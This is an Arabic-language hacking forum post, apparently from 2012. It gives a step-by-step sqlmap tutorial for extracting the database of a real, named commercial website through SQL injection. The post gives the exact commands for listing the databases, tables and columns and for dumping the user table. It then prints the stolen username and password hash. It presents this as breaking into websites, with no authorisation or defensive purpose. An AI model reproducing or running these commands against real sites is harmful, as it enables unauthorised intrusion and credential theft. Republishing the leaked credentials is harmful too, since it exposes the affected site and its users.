مدونة ومنتديات صهيب هكر فلسطين


 
الرئيسيةبحـثالتسجيلدخول
دخول
اسم العضو:
كلمة السر:
ادخلني بشكل آلي عند زيارتي مرة اخرى: 
:: لقد نسيت كلمة السر
خدمات اقدمها لكم
  • طريقة اخفاء الاي بي
  • المواضيع الأخيرة
    أفضل 10 أعضاء في هذا المنتدى
    sohaib hack
     
    مسترر زيرو
     
    Ab-oood
     
    هہٰہٰتلہٰرالمغربي
     
    فلسطيني حر
     
    hero01
     
    سمو المتمرد
     
    mohamed120
     

    شاطر | 
     

     اختراق المواقع عبر الباك تراك باستخدام اداة sqlmap

    استعرض الموضوع السابق استعرض الموضوع التالي اذهب الى الأسفل 
    كاتب الموضوعرسالة
    sohaib hack
    Admin
    Admin
    avatar

    عدد المساهمات : 121
    نقاط : 323
    تاريخ التسجيل : 20/09/2012

    مُساهمةموضوع: اختراق المواقع عبر الباك تراك باستخدام اداة sqlmap   الثلاثاء أكتوبر 23, 2012 11:22 pm

    بسم الله الرحمن الرحيم
    السلام عليكم ورحمة الله وبركاته
    الكل يعرف انه ثغرات sql من اقوى واكثر الثغرات انتشارا واحيانا تاخذ وقت في عملية الأستهداف ولاكن الان تستطيع استهداف المواقع المصابة بكل سرعة ممكنة باستخدام اداة في الباك تراك
    اسم الأداة :sqlmap
    مسار الاداة : /pentest/database/sqlmap
    لغة البرمجة : python
    الأن كيفية استخدام الاداة في عملية الحقن

    اولا : استخراج اسماء قواعد البيانات
    لنقل ان هذا الموقع مصاب بثغرة sql

    http://www.bcspeakers.com/page.php?id=22

    وكلنا نعرف كيفية الفحص وهي باضافة ' الى نهاية الرابط واذا وجد خطأ كان الموقع مصاب
    الأن الأمر المستخدم في استخراج القواعد لهذا الموقع

    python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 --dbs

    النتيجة

    available databases [2]:
    [*] information_schema
    [*] www-bcspeakerstest

    مثل ما شفتو تم استخراج القواعد والان القاعدة المستهدفة هي " www-bcspeakerstest"
    ثانيا : استخراج الجداول
    القاعدة المستهدفة هي " www-bcspeakerstest"
    سوف يكون الأمر بهذا الشكل

    python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest --tables

    والنتيجة كبيرة لن اضعها لانها تتكون من 59 جدول على كل حال انا وجدت الجدول المستهدف وهو "_user"
    ثالثا : استخراج الأعمدة
    الان نأتي الى استخراج الأعمدة الموجودة في جدول "_user"
    الكود كالتالي

    python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest -T _user --columns

    والنتيجة كالتالي

    +----------+---------------------------+
    | Column | Type |
    +----------+---------------------------+
    | id_user | int(10) unsigned zerofill |
    | password | text |
    | username | text |
    +----------+---------------------------+

    كما ترون الأعمدة المستهدفة هي
    password
    username
    رابعا : اسخراج البيانات من الاعمدة
    العمود الاول هو عامود اسم المستخدم "username" سوف يكون الكود كالتالي

    python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest -T _user -C username --dump

    كما ترون الأعمدة المستهدفة هي
    password
    username
    رابعا : اسخراج البيانات من الاعمدة
    العمود الاول هو عامود اسم المستخدم "username" سوف يكون الكود كالتالي

    python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest -T _user -C username --dump

    النتيجة

    +--------------+
    | username |
    +--------------+
    | becspeak2803 |
    | becspeak2803 |
    +--------------+

    كما ترون استخرجنا اسم المستخدم
    والان نأتي الى استخراج الباسورود
    اكود مثل السابق مع تغيير اسم العامود الى عامود الباسوورد

    python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest -T _user -C password --dump

    سوف تسألك الأداة اذا كنت تريد محاولة مقارنة الهاش مع قاعدة البيانات المرفقة باالأداة

    recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q]

    تختار مثل ما نت عاوز
    انا اخترت لا لتسريع العملية والنتيجة كالتالي

    | password |
    +----------------------------------+
    | 286adae502ad9d5ab8c4f8644050b448 |
    | 286adae502ad9d5ab8c4f8644050b448 |

    كما ترون تم استخراج البيانات بسرعة كبيرة
    اتمنى ان يعجبكم الشرح
    الرجوع الى أعلى الصفحة اذهب الى الأسفل
    معاينة صفحة البيانات الشخصي للعضو http://sohaib-hack.lolbb.com
     
    اختراق المواقع عبر الباك تراك باستخدام اداة sqlmap
    استعرض الموضوع السابق استعرض الموضوع التالي الرجوع الى أعلى الصفحة 
    صفحة 1 من اصل 1

    صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
    مدونة ومنتديات صهيب هكر فلسطين :: تعلم الهكر :: قسم البااك تراك-
    انتقل الى: